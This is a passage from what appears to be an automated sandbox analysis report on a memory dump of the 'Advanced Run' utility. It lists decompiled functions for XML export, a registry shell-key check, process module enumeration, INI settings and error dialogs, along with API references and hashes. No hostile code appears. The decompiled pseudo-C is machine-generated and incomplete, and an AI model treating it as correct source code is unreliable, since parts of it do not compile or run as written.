				return E00407343(_t29, _a4,  &_v1028);
			}

0x00407d9c
0x00407d9e
0x00407da5
0x00407db3
0x00407dba
0x00407dc5
0x00407dc7
0x00407dd0
0x00407dc9
0x00407dc9
0x00407dc9
0x00407dd8
0x00407de1
0x00407de5
0x00407deb
0x00407df2
0x00407df3
0x00407dfe
0x00407e03
0x00407e04
0x00407e21

APIs

memset.MSVCRT ref: 00407DA5
memset.MSVCRT ref: 00407DBA
_snwprintf.MSVCRT ref: 00407E04

Strings

<?xml version="1.0" ?>, xrefs: 00407DC9
<%s>, xrefs: 00407DF3
<?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00407DD0

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf
String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
API String ID: 3473751417-2880344631
Opcode ID: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
Instruction ID: f522b8c77a058770ba0888167d6ec5df55c59d6d485a4440fbbc7c77367e2349
Opcode Fuzzy Hash: 9364f374d7518812a9165f05dfc0ba647ea39d808db9dc8e90e0893e61590c4e
Instruction Fuzzy Hash: E0019BB1E402197AD710A695CC45FBE766CEF44344F0001FBBA08F3191D738AE4586ED

Uniqueness

Uniqueness Score: -1.00%

Function 00403B3C, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 52
COMMON

Download Yara Rule

C-Code - Quality: 70%

			E00403B3C(intOrPtr _a4) {
				void _v526;
				char _v528;
				void _v2574;
				char _v2576;
				void* __edi;
				intOrPtr _t29;

				_v2576 = 0;
				memset( &_v2574, 0, 0x7fe);
				_v528 = 0;
				memset( &_v526, 0, 0x208);
				E00404AD9( &_v528);
				_push( &_v528);
				_push(L"\"%s\" /EXEFilename \"%%1\"");
				_push(0x3ff);
				_push( &_v2576);
				L0040B1EC();
				_t37 = _a4 + 0xa68;
				E00404923(0x104, _a4 + 0xa68, L"exefile");
				E00404923(0x104, _a4 + 0xc72, L"Advanced Run");
				E00404923(0x3ff, _t37 + 0x414,  &_v2576);
				_t29 = E0040467A(_t37);
				 *((intOrPtr*)(_a4 + 0x167c)) = _t29;
				return _t29;
			}

0x00403b56
0x00403b5d
0x00403b6f
0x00403b76
0x00403b82
0x00403b8d
0x00403b8e
0x00403b99
0x00403b9e
0x00403b9f
0x00403ba7
0x00403bb9
0x00403bce
0x00403be5
0x00403bef
0x00403bf8
0x00403c00

APIs

memset.MSVCRT ref: 00403B5D
memset.MSVCRT ref: 00403B76

Part of subcall function 00404AD9: GetModuleFileNameW.KERNEL32(00000000,e/@,00000104,00402F65,00000000,?,?,00000000), ref: 00404AE4

_snwprintf.MSVCRT ref: 00403B9F

Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940

Part of subcall function 0040467A: memset.MSVCRT ref: 004046AF
Part of subcall function 0040467A: _snwprintf.MSVCRT ref: 004046CD
Part of subcall function 0040467A: RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
Part of subcall function 0040467A: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA

Strings

Advanced Run, xrefs: 00403BBE
"%s" /EXEFilename "%%1", xrefs: 00403B8E
exefile, xrefs: 00403BAD

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$_snwprintf$CloseFileModuleNameOpenmemcpywcslen
String ID: "%s" /EXEFilename "%%1"$Advanced Run$exefile
API String ID: 1832587304-479876776
Opcode ID: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
Instruction ID: c5548abdd2f98fe5b378efca96f69d72dd5acd8230f4ce7b006819db5738462c
Opcode Fuzzy Hash: 0a24b3981c90f53bc0afe707e01056d79404e7683c9323ccd1d0569bed7942f0
Instruction Fuzzy Hash: 6B11A3B29403186AD720E761CC05ACF776CDF45314F0041B6BA08B71C2D77C5B418B9E

Uniqueness

Uniqueness Score: -1.00%

Function 0040AFBE, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 45
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040AFBE(void* __esi, void* _a4, wchar_t* _a8, wchar_t* _a12) {
				void* _v8;
				int _v12;
				short _v524;
				char _v1036;
				void* __edi;

				wcscpy( &_v524, L"\\StringFileInfo\\");
				wcscat( &_v524, _a8);
				wcscat( &_v524, "\\");
				wcscat( &_v524, _a12);
				if(VerQueryValueW(_a4,  &_v524,  &_v8,  &_v12) == 0) {
					return 0;
				}
				_t34 =  &_v1036;
				E00404923(0xff,  &_v1036, _v8);
				E004049A2(_t34, __esi);
				return 1;
			}

0x0040afd3
0x0040afe2
0x0040aff3
0x0040b002
0x0040b023
0x00000000
0x0040b047
0x0040b02e
0x0040b034
0x0040b03c
0x00000000

APIs

wcscpy.MSVCRT ref: 0040AFD3
wcscat.MSVCRT ref: 0040AFE2
wcscat.MSVCRT ref: 0040AFF3
wcscat.MSVCRT ref: 0040B002
VerQueryValueW.VERSION(?,?,00000000,?), ref: 0040B01C

Part of subcall function 00404923: wcslen.MSVCRT ref: 0040492A
Part of subcall function 00404923: memcpy.MSVCRT ref: 00404940

Part of subcall function 004049A2: lstrcpyW.KERNEL32 ref: 004049B7
Part of subcall function 004049A2: lstrlenW.KERNEL32(?), ref: 004049BE

Strings

\StringFileInfo\, xrefs: 0040AFCD

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: wcscat$QueryValuelstrcpylstrlenmemcpywcscpywcslen
String ID: \StringFileInfo\
API String ID: 393120378-2245444037
Opcode ID: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
Instruction ID: 46c7c43bb965d9609608e4f6c2ae6b517043b349f439a100f6d085a340de75fe
Opcode Fuzzy Hash: 045a8df20043a551ca88a82222e75e8b313ea16cabd954164b3126fb0df90005
Instruction Fuzzy Hash: CF015EB290020DA6DB11EAA2CC45DDF776DDB44304F0005B6B654F2092EB3CDA969A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405E8D, Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 26COMMON

Download Yara Rule

APIs

_snwprintf.MSVCRT ref: 00405EB2
wcscpy.MSVCRT ref: 00405ED5

Strings

general, xrefs: 00405ECB
dialog_%d, xrefs: 00405EA6
strings, xrefs: 00405EC0
menu_%d, xrefs: 00405E96

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintfwcscpy
String ID: dialog_%d$general$menu_%d$strings
API String ID: 999028693-502967061
Opcode ID: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
Instruction ID: fc2f6d5a95cb840c7437c23e5da9cc5f651b22c54dcbfaa02992beb3cb27aad2
Opcode Fuzzy Hash: b64df2e80323ba4b17253e10f943d6139d2bc5d6bf6da17a7692c82038848a44
Instruction Fuzzy Hash: CDE08C31A94B00B5E96423418DC7F2B2801DE90B14FB0083BF686B05C1E6BDBA0528DF

Uniqueness

Uniqueness Score: -1.00%

Function 004092F0, Relevance: 9.1, APIs: 6, Instructions: 141
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E004092F0(void* __ecx, void* __eflags, long _a4, void _a8, intOrPtr _a12, long _a16, intOrPtr _a508, intOrPtr _a512, intOrPtr _a540, intOrPtr _a544, char _a552, char _a560, intOrPtr _a572, intOrPtr _a576, intOrPtr _a580, long _a1096, char _a1600, int _a1616, void _a1618, char _a2160) {
				void* _v0;
				intOrPtr _v4;
				intOrPtr _v8;
				unsigned int _v12;
				void* _v16;
				char _v20;
				char _v24;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t58;
				void* _t59;
				void* _t69;
				void* _t72;
				intOrPtr _t78;
				void _t89;
				signed int _t90;
				int _t98;
				signed int _t105;
				signed int _t106;
				void* _t109;

				_t106 = _t105 & 0xfffffff8;
				E0040B550(0x8874, __ecx);
				_t98 = 0;
				_a8 = 0;
				if(E00404BD3() == 0) {
					L12:
					__eflags =  *0x4101b8 - _t98; // 0x0
					if(__eflags != 0) {
						_t89 = _a4;
						_t58 =  *0x40f83c(8, _t89);
						__eflags = _t58 - 0xffffffff;
						_v8 = _t58;
						if(_t58 != 0xffffffff) {
							_v0 = 1;
							_a560 = 0x428;
							_t59 =  *0x40f834(_t58,  &_a560);
							while(1) {
								__eflags = _t59;
								if(_t59 == 0) {
									goto L18;
								}
								memset( &_a8, _t98, 0x21c);
								_a12 = _a580;
								_a8 = _t89;
								wcscpy( &_a16,  &_a1096);
								_a540 = _a576;
								_t106 = _t106 + 0x14;
								_a544 = _a572;
								_a552 = 0x428;
								_t69 = E00409510(_a8,  &_a8);
								__eflags = _t69;
								if(_t69 != 0) {
									_t59 =  *0x40f830(_v16,  &_a552);
									continue;
								}
								goto L18;
							}
							goto L18;
						}
					}
				} else {
					_t109 =  *0x4101bc - _t98; // 0x0
					if(_t109 == 0) {
						goto L12;
					} else {
						_t72 = OpenProcess(0x410, 0, _a4);
						_v0 = _t72;
						if(_t72 != 0) {
							_push( &_a4);
							_push(0x8000);
							_push( &_a2160);
							_push(_t72);
							if( *0x40f840() != 0) {
								_t6 =  &_v12;
								 *_t6 = _v12 >> 2;
								_v8 = 1;
								_t90 = 0;
								if( *_t6 != 0) {
									while(1) {
										_a1616 = _t98;
										memset( &_a1618, _t98, 0x208);
										memset( &_a8, _t98, 0x21c);
										_t78 =  *((intOrPtr*)(_t106 + 0x898 + _t90 * 4));
										_t106 = _t106 + 0x18;
										_a8 = _a4;
										_a12 = _t78;
										 *0x40f838(_v16, _t78,  &_a1616, 0x104);
										E0040920A( &_v0,  &_a1600);
										_push(0xc);
										_push( &_v20);
										_push(_v4);
										_push(_v32);
										if( *0x40f844() != 0) {
											_a508 = _v32;
											_a512 = _v36;
										}
										if(E00409510(_a8,  &_v24) == 0) {
											goto L18;
										}
										_t90 = _t90 + 1;
										if(_t90 < _v44) {
											_t98 = 0;
											__eflags = 0;
											continue;
										} else {
										}
										goto L18;
									}
								}
							}
							L18:
							CloseHandle(_v16);
						}
					}
				}
				return _a8;
			}

0x004092f3
0x004092fb
0x00409303
0x00409305
0x00409310
0x00409433
0x00409433
0x00409439
0x0040943f
0x00409445
0x0040944b
0x0040944e
0x00409452
0x00409466
0x0040946e
0x00409475
0x004094f7
0x004094f7
0x004094f9
0x00000000
0x00000000
0x00409488
0x00409494
0x004094a5
0x004094a9
0x004094b5
0x004094c3
0x004094c6
0x004094d5
0x004094dc
0x004094e1
0x004094e3
0x004094f1
0x00000000
0x004094f1
0x00000000
0x004094e3
0x00000000
0x004094f7
0x00409452
0x00409316
0x00409316
0x0040931c
0x00000000
0x00409322
0x0040932b
0x00409333
0x00409337
0x00409341
0x00409342
0x0040934e
0x0040934f
0x00409358
0x0040935e
0x0040935e
0x00409363
0x0040936b
0x0040936d
0x00409377
0x00409385
0x0040938d
0x0040939d
0x004093a5
0x004093ac
0x004093b4
0x004093c5
0x004093c9
0x004093da
0x004093df
0x004093e5
0x004093e6
0x004093ea
0x004093f6
0x004093fc
0x00409407
0x00409407
0x0040941d
0x00000000
0x00000000
0x00409423
0x00409428
0x00409375
0x00409375
0x00000000
0x00000000
0x0040942e
0x00000000
0x00409428
0x00409377
0x0040936d
0x004094fb
0x004094ff
0x004094ff
0x00409337
0x0040931c
0x0040950f

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000,?,00000000,00000000,?,00408CE3,00000000,00000000), ref: 0040932B
memset.MSVCRT ref: 0040938D
memset.MSVCRT ref: 0040939D

Part of subcall function 0040920A: wcscpy.MSVCRT ref: 00409233

memset.MSVCRT ref: 00409488
wcscpy.MSVCRT ref: 004094A9
CloseHandle.KERNEL32(?,00408CE3,?,?,?,00408CE3,00000000,00000000), ref: 004094FF

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: memset$wcscpy$CloseHandleOpenProcess
String ID:
API String ID: 3300951397-0
Opcode ID: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
Instruction ID: b0ac5d6e05c2becfea0857ee93370de63ec0533c429aeeb167529e34c4b0c205
Opcode Fuzzy Hash: 35b1b47fb41be2c3e4820f38a09934af673dc0f51eb17e2be69c8f32b4af62fe
Instruction Fuzzy Hash: AE512A71108345ABD720DF65CC88A9BB7E8FFC4304F404A3EF989A2291DB75D945CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00402EC8, Relevance: 9.0, APIs: 6, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 44%

			E00402EC8(void* __ebx) {
				struct tagRECT _v20;
				struct tagPAINTSTRUCT _v84;

				GetClientRect( *(__ebx + 0x10),  &_v20);
				_v20.left = _v20.right - GetSystemMetrics(0x15);
				_v20.top = _v20.bottom - GetSystemMetrics(0x14);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				DrawFrameControl(BeginPaint( *(__ebx + 0x10),  &_v84),  &_v20, 3, 8);
				return EndPaint( *(__ebx + 0x10),  &_v84);
			}

0x00402ed7
0x00402eee
0x00402ef8
0x00402f00
0x00402f01
0x00402f05
0x00402f0a
0x00402f1a
0x00402f30

APIs

GetClientRect.USER32 ref: 00402ED7
GetSystemMetrics.USER32 ref: 00402EE5
GetSystemMetrics.USER32 ref: 00402EF1
BeginPaint.USER32(?,?), ref: 00402F0B
DrawFrameControl.USER32 ref: 00402F1A
EndPaint.USER32(?,?), ref: 00402F27

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: MetricsPaintSystem$BeginClientControlDrawFrameRect
String ID:
API String ID: 19018683-0
Opcode ID: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
Instruction ID: c8721ad6730a543cd54d50ae751cb56b62cc93be397439d4b1c9778783e315ec
Opcode Fuzzy Hash: 8c0e1e97105e41a4185fd691eb38b3eaa50651c9f1af749464abe97b92a3298f
Instruction Fuzzy Hash: 8C01EC72900218EFDF04DFA4DD859FE7B79FB44301F000569EA11AA195DA71A904CF90

Uniqueness

Uniqueness Score: -1.00%

Function 004079A4, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57
COMMON

Download Yara Rule

C-Code - Quality: 50%

			E004079A4(void* __edi, void* __esi, intOrPtr _a4, intOrPtr* _a8) {
				void _v514;
				signed short _v516;
				signed short* _t34;
				signed int _t37;
				void* _t40;
				signed short* _t44;
				void* _t46;

				_t40 = __edi;
				E00407343(__edi, _a4, L"<item>\r\n");
				_t37 = 0;
				if( *((intOrPtr*)(__edi + 0x2c)) > 0) {
					do {
						_v516 = _v516 & 0x00000000;
						memset( &_v514, 0, 0x1fc);
						E0040ADF1( *((intOrPtr*)( *_a8))( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4),  *((intOrPtr*)(__edi + 0x60))),  *((intOrPtr*)(__edi + 0x64)));
						_t44 =  &_v516;
						E00407250(_t44,  *((intOrPtr*)( *( *((intOrPtr*)(__edi + 0x30)) + _t37 * 4) * 0x14 +  *((intOrPtr*)(__edi + 0x40)) + 0x10)));
						_t34 = _t44;
						_push(_t34);
						_push( *((intOrPtr*)(__edi + 0x64)));
						_push(_t34);
						_push(L"<%s>%s</%s>\r\n");
						_push(0x2000);
						_push( *((intOrPtr*)(__edi + 0x68)));
						L0040B1EC();
						_t46 = _t46 + 0x24;
						E00407343(__edi, _a4,  *((intOrPtr*)(__edi + 0x68)));
						_t37 = _t37 + 1;
					} while (_t37 <  *((intOrPtr*)(__edi + 0x2c)));
				}
				return E00407343(_t40, _a4, L"</item>\r\n");
			}

0x004079a4
0x004079b8
0x004079bd
0x004079c2
0x004079c5
0x004079c5
0x004079db
0x004079f7
0x00407a06
0x00407a0c
0x00407a11
0x00407a13
0x00407a14
0x00407a17
0x00407a18
0x00407a1d
0x00407a22
0x00407a25
0x00407a2a
0x00407a35
0x00407a3a
0x00407a3b
0x00407a40
0x00407a52

APIs

memset.MSVCRT ref: 004079DB

Part of subcall function 0040ADF1: memcpy.MSVCRT ref: 0040AE6E

Part of subcall function 00407250: wcscpy.MSVCRT ref: 00407255
Part of subcall function 00407250: _wcslwr.MSVCRT ref: 00407288

_snwprintf.MSVCRT ref: 00407A25

Strings

<item>, xrefs: 004079AE
<%s>%s</%s>, xrefs: 00407A18
</item>, xrefs: 00407A41

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: _snwprintf_wcslwrmemcpymemsetwcscpy
String ID: <%s>%s</%s>$</item>$<item>
API String ID: 1775345501-2769808009
Opcode ID: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
Instruction ID: c8ba369f0531ab1f4cd0c6f6a7ba1592bf00f2a9533aec28b16f0bdd84d8fa76
Opcode Fuzzy Hash: 3db2232b312ed916784b241718d450bfb00e2b25eb8021401c0f03919c4bf03b
Instruction Fuzzy Hash: 3D119131A40219BFDB21AB65CC86E5A7B25FF04308F00006AFD0477692C739B965DBD9

Uniqueness

Uniqueness Score: -1.00%

Function 0040467A, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E0040467A(void* __edi) {
				signed int _v8;
				void* _v12;
				void* _v16;
				void _v2062;
				short _v2064;
				int _t16;

				_v8 = _v8 & 0x00000000;
				_t16 = E004043F8( &_v12, 0x20019);
				if(_t16 == 0) {
					_v2064 = _v2064 & _t16;
					memset( &_v2062, _t16, 0x7fe);
					_push(__edi + 0x20a);
					_push(L"%s\\shell\\%s");
					_push(0x3ff);
					_push( &_v2064);
					L0040B1EC();
					if(RegOpenKeyExW(_v12,  &_v2064, 0, 0x20019,  &_v16) == 0) {
						_v8 = 1;
						RegCloseKey(_v16);
					}
				}
				return _v8;
			}

0x00404683
0x00404692
0x00404699
0x0040469b
0x004046af
0x004046ba
0x004046bc
0x004046c7
0x004046cc
0x004046cd
0x004046ee
0x004046f3
0x004046fa
0x004046fa
0x004046ee
0x00404705

APIs

memset.MSVCRT ref: 004046AF
_snwprintf.MSVCRT ref: 004046CD
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,?,?,?,?,?,00020019), ref: 004046E6
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,00020019), ref: 004046FA

Strings

%s\shell\%s, xrefs: 004046BC

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseOpen_snwprintfmemset
String ID: %s\shell\%s
API String ID: 1458959524-3196117466
Opcode ID: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
Instruction ID: 1855bd24da60c853c30f7b3e18bb60aca338c900c60696cbbcdbf1fba26ecf92
Opcode Fuzzy Hash: dd937bb9006710e66f977af40412b0b6fd133ebddff1bc1205fab9b1dc2b10fe
Instruction Fuzzy Hash: 20011EB5D00218FADB109BD1DD45FDAB7BCEF44314F0041B6AA04F2181EB749B489BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00409D5F, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E00409D5F(void* __ecx, wchar_t* __esi, void* __eflags, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, WCHAR* _a16, long _a20, WCHAR* _a24) {
				signed short _v131076;

				_t25 = __esi;
				E0040B550(0x20000, __ecx);
				if(_a4 == 0) {
					return GetPrivateProfileStringW(_a8, _a12, _a16, __esi, _a20, _a24);
				} else {
					if(__esi == 0 || wcschr(__esi, 0x22) == 0) {
						_push(_a24);
					} else {
						_v131076 = _v131076 & 0x00000000;
						_push(__esi);
						_push(L"\"%s\"");
						_push(0xfffe);
						_push( &_v131076);
						L0040B1EC();
						_push(_a24);
						_push( &_v131076);
					}
					return WritePrivateProfileStringW(_a8, _a12, ??, ??);
				}
			}

0x00409d5f
0x00409d67
0x00409d70
0x00409ddb
0x00409d72
0x00409d74
0x00409db2
0x00409d84
0x00409d84
0x00409d8c
0x00409d8d
0x00409d98
0x00409d9d
0x00409d9e
0x00409da6
0x00409daf
0x00409daf
0x00409dc3
0x00409dc3

APIs

wcschr.MSVCRT ref: 00409D79
_snwprintf.MSVCRT ref: 00409D9E
WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00409DBC
GetPrivateProfileStringW.KERNEL32 ref: 00409DD4

Strings

"%s", xrefs: 00409D8D

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: PrivateProfileString$Write_snwprintfwcschr
String ID: "%s"
API String ID: 1343145685-3297466227
Opcode ID: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
Instruction ID: cff84325bbeeabecfb89bf19508a3778b9d9768fc6139f0f3fcaa17558a1ecc1
Opcode Fuzzy Hash: ba2a529124e3a207c998afa530794a8b3af16421fe15764eebdae90aacee263b
Instruction Fuzzy Hash: BA018B3244421AFADF219F90DC45FDA3B6AEF04348F008065BA14701E3D739C921DB98

Uniqueness

Uniqueness Score: -1.00%

Function 004047D2, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31
windowCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E004047D2(long __ecx, void* __eflags, struct HWND__* _a4) {
				char _v2052;
				short _v4100;
				void* __edi;
				long _t15;
				long _t16;

				_t15 = __ecx;
				E0040B550(0x1000, __ecx);
				_t16 = _t15;
				if(_t16 == 0) {
					_t16 = GetLastError();
				}
				E00404706(_t16,  &_v2052);
				_push( &_v2052);
				_push(_t16);
				_push(L"Error %d: %s");
				_push(0x400);
				_push( &_v4100);
				L0040B1EC();
				return MessageBoxW(_a4,  &_v4100, L"Error", 0x30);
			}

0x004047d2
0x004047da
0x004047e0
0x004047e4
0x004047ec
0x004047ec
0x004047f5
0x00404800
0x00404801
0x00404802
0x0040480d
0x00404812
0x00404813
0x00404834

APIs

GetLastError.KERNEL32(?,?,004035EB,?,?), ref: 004047E6
_snwprintf.MSVCRT ref: 00404813
MessageBoxW.USER32(?,?,Error,00000030), ref: 0040482C

Strings

Error, xrefs: 0040481D
Error %d: %s, xrefs: 00404802

Memory Dump Source

Source File: 0000000C.00000002.330897038.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000C.00000002.330889591.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330918001.000000000040C000.00000002.00020000.sdmp Download File
Associated: 0000000C.00000002.330926858.000000000040F000.00000004.00020000.sdmp Download File
Associated: 0000000C.00000002.330939769.000000000041D000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastMessage_snwprintf
String ID: Error$Error %d: %s
API String ID: 313946961-1552265934
Opcode ID: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
Instruction ID: 90e5118ee4f46ea14b6138c5fdcdbe0805ab296af9aaa7bfd3b1d45c15712702
Opcode Fuzzy Hash: 9fa9ceadd2aea683486b90f32a73d9d70e1e2e007ee85f632c4fe4fcea7526ce
Instruction Fuzzy Hash: 30F08975500208A6C711A795CC46FD572ACEB44785F0401B6B604F31C1DB78AA448A9C

Uniqueness

Uniqueness Score: -1.00%

Function 004068EC, Relevance: 7.6, APIs: 6, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E004068EC(intOrPtr* __eax, void* __eflags, intOrPtr _a4) {
				void* _v8;
				signed int _v12;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __esi;
				signed int _t74;
				signed int _t76;
				signed short _t85;
				signed int _t87;
				intOrPtr _t88;
				signed short _t93;
				void* _t95;
				signed int _t124;
				signed int _t126;
				signed int _t128;
				intOrPtr* _t131;
				signed int _t135;
				signed int _t137;
				signed int _t138;
				void* _t141;
				void* _t142;
				void* _t146;

				_t142 = __eflags;
				_push(_t102);
				_t131 = __eax;
				 *((intOrPtr*)(__eax + 4)) =  *((intOrPtr*)( *__eax + 0x68))();
				E00406746(__eax);
				 *(_t131 + 0x38) =  *(_t131 + 0x38) & 0x00000000;
				_t135 = 5;
				 *((intOrPtr*)(_t131 + 0x2a0)) = _a4;
				_t124 = 0x14;
				_t74 = _t135 * _t124;
				 *(_t131 + 0x2d0) = _t135;
				_push( ~(0 | _t142 > 0x00000000) | _t74);
				L0040B26C();
				 *(_t131 + 0x2d4) = _t74;
				_t126 = 0x14;
				_t76 = _t135 * _t126;
				_push( ~(0 | _t142 > 0x00000000) | _t76);
				L0040B26C();
				_t95 = 0x40f008;
				 *(_t131 + 0x40) = _t76;
				_v8 = 0x40f008;
				do {
					_t137 =  *_t95 * 0x14;
					memcpy( *(_t131 + 0x2d4) + _t137, _t95, 0x14);
					_t24 = _t95 + 0x14; // 0x40f01c
					memcpy( *(_t131 + 0x40) + _t137, _t24, 0x14);
					_t85 =  *( *(_t131 + 0x2d4) + _t137 + 0x10);
					_t141 = _t141 + 0x18;
					_v12 = _t85;
					 *( *(_t131 + 0x40) + _t137 + 0x10) = _t85;
					if((_t85 & 0xffff0000) == 0) {
						 *( *(_t131 + 0x2d4) + _t137 + 0x10) = E00405B81(_t85 & 0x0000ffff);
						_t93 = E00405B81(_v12 | 0x00010000);
						_t95 = _v8;
						 *( *(_t131 + 0x40) + _t137 + 0x10) = _t93;
					}
					_t95 = _t95 + 0x28;
					_t146 = _t95 - 0x40f0d0;
					_v8 = _t95;
				} while (_t146 < 0);
				 *(_t131 + 0x44) =  *(_t131 + 0x44) & 0x00000000;
				_t138 = 5;
				_t128 = 4;
				_t87 = _t138 * _t128;
				 *((intOrPtr*)(_t131 + 0x48)) = 1;
				 *(_t131 + 0x2c) = _t138;
				 *((intOrPtr*)(_t131 + 0x28)) = 0x20;
				_push( ~(0 | _t146 > 0x00000000) | _t87);
				L0040B26C();
				_push(0xc);
				 *(_t131 + 0x30) = _t87;
				L0040B26C();
				_t139 = _t87;
				if(_t87 == 0) {
					_t88 = 0;
					__eflags = 0;
				} else {
					_t88 = E00406607(_a4,  *((intOrPtr*)(_t131 + 0x58)), _t139);
